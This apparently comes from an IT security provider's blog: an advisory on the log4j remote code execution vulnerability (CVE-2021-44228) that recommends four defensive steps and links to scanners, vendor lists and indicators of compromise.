The aim of this article is to provide some core information about the log4j vulnerability which has been generating a lot of noise in the last few days as well as a list of 4x steps we are recommending based on advice from government agencies and security groups we are a member of.
This vulnerability is serious as it affects a very wide range of devices (CISCO, Checkpoint etc) and applications/services (Vmware vcenter, Apache based website, sentinel one, etc).
It has a CVSS score of 10/10 (critical), the worse possible and allows unauthenticated remote code execution: CVE-2021-44228
The vulnerability affects applications running all versions of log4j before version 2.15.0 and is exploited by sending a specific text string that is interpreted by the log4j library
The Cybersecurity & Infrastructure Security Agency (CISA) has issued some guidance about it: CISA Guidance
The 4x steps to prioritise:
- Start with enumerating all the devices that are internet facing and check if they are vulnerable such as: egress points, firewall, routers, web servers/applications, etc
- Check internal devices for this vulnerability:
- First with any devices that may process internet traffic, such as internal web servers/applications, endpoints, etc
- Any other devices as this vulnerability could be used by a malicious insider or when a hacker has gained inside access
- Configure your IDS/IPS and WAF to detect/stop this vulnerability. However, this has a limited effect as those strings can be obfuscated/changed. Nonetheless, this can help stopping some of the attacks.
- Review key assets logs for signs of compromise/attacks linked to that vulnerability
Useful Resources:
- To check if a device/application/service is vulnerable:
- Check with the vendor
- Use a scanner such as Nessus or any reputable free scripts available such as: Lunasec github
- Apache official log4j vulnerability page: Apache log4j
- CISA will maintain a list of vulnerable services/application in its github repository (it is empty at the moment but this should change soon): CISA Github vulnerable vendor Database
- A list of vulnerable services/applications (not verified so used with care, but already useful to get an idea of what is vulnerable): List of vulnerable vendors
- A guide on how to detect and remediate the vulnerabiltiy by Lunasec: Lunasec Log4j guidance
- A list of Indication of Compromise (IOC): IOC
To conclude, this is not just another “vulnerability” as it affects so many different vendors and is being actively exploited, there is also credible rumors of threat actors starting to create worms with that vulnerability, linking it to other attacks with LDAP, etc. It means that it will only get worse in the coming days/weeks.